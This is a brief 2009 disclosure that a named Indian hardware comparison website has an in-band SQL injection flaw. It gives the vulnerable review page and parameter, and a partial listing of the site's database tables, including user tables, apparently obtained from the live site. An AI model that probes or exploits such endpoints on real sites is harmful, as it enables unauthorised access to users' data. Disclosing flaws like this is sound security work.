India's biggest hardware comparison website, compareindia.in.com, suffers from a remote SQL injection vulnerability.
f821f08efe58a7df57ee30d46c0247303db76a798e9b8a9a71d8c3f61d6513c5
====================================================================
Website: http://compareindia.in.com/
Category: India's biggest hardware comparision website + buyer's guide
Vulnerability: Inband SQL Injection
Founder: Jaydeep Dave [jaydipdave@gmail.com]
Date: 16th Feb, 2009
====================================================================
== P O C ===========================================================
URL:
http://compareindia.in.com/writeyourreview.php?prodid=3333
Database: compareindia
[124 tables]
+-------------------+
| expertanswer |
| companymaster |
| cmslog |
| phpbb_users |
| storerating |
| boxmanagement |
| dealemaster |
| dealerupload |
| pollresults |
| productdetails |
| users |
| specorder |
| ... |
+-------------------+
====================================================================